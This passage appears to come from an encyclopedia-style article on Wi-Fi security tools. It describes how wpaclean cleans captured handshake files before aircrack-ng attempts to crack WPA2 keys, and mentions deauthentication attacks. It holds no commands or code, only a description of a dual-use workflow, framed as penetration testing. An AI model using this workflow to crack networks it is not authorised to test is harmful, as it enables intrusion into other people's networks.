By preparing cleaned capture files, wpaclean facilitates faster execution of dictionary or brute-force attacks on WPA2 pre-shared keys in aircrack-ng, as the reduced dataset minimizes parsing overhead and potential errors from noisy inputs. This preprocessing step is particularly valuable in penetration testing workflows, where post-capture refinement ensures that only viable handshake data proceeds to cracking, allowing users to verify the presence of necessary EAPOL messages (messages 1 through 4) without sifting through voluminous raw traffic. In practice, after capturing potential handshakes during a deauthentication attack, running wpaclean on the resulting files prepares them directly for key recovery attempts, enhancing the overall efficacy of Wi-Fi security assessments.[46][47]